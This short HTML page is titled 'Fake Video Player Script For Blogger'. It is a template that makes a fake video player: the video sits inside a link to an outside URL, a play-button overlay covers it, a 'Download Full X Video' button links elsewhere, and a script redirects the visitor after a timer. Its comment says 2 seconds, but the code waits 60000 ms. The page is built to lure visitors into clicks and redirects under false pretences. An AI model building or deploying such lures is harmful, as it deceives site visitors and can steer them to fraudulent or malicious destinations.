Fake Video Player Script For Blogger
<!DOCTYPE html>
<html>
<head>
<script>
setTimeout(function() {
window.location.href = "direct linkl";
}, 60000); // 2 seconds delay
</script>
<title>title</title>
<style>
.video-container {
position: relative;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}
.play-button {
position: absolute;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
width: 80px;
height: 80px;
background: rgba(0, 0, 0, 0.5);
border-radius: 50%;
color: #fff;
font-size: 40px;
line-height: 80px;
text-align: center;
cursor: pointer;
}
video {
cursor: pointer;
}
.download-button {
display: flex;
justify-content: center;
align-items: center;
margin-top: 20px;
}
.download-button a {
display: inline-block;
padding: 12px 20px;
background-color: #f44336;
color: #fff;
text-decoration: none;
font-weight: bold;
border-radius: 4px;
transition: background-color 0.3s ease;
}
.download-button a:hover {
background-color: #d32f2f;
}
</style>
</head>
<body>
<div class="video-container">
<a href="video direct link" target="_blank">
<video width="960" height="540" poster="image source" controls>
<source src="<data:post.videoUrl/>" type="video/mp4">
Your browser does not support the video tag.
</video>
</a>
<div class="play-button">►</div>
</div>
<div class="download-button">
<a href="download direct link" target="_blank">Download Full X Video</a>
</div>
<div>
<h1><data:post.title/></h1>
<p><data:post.body/></p>
</div>
</body>
</html>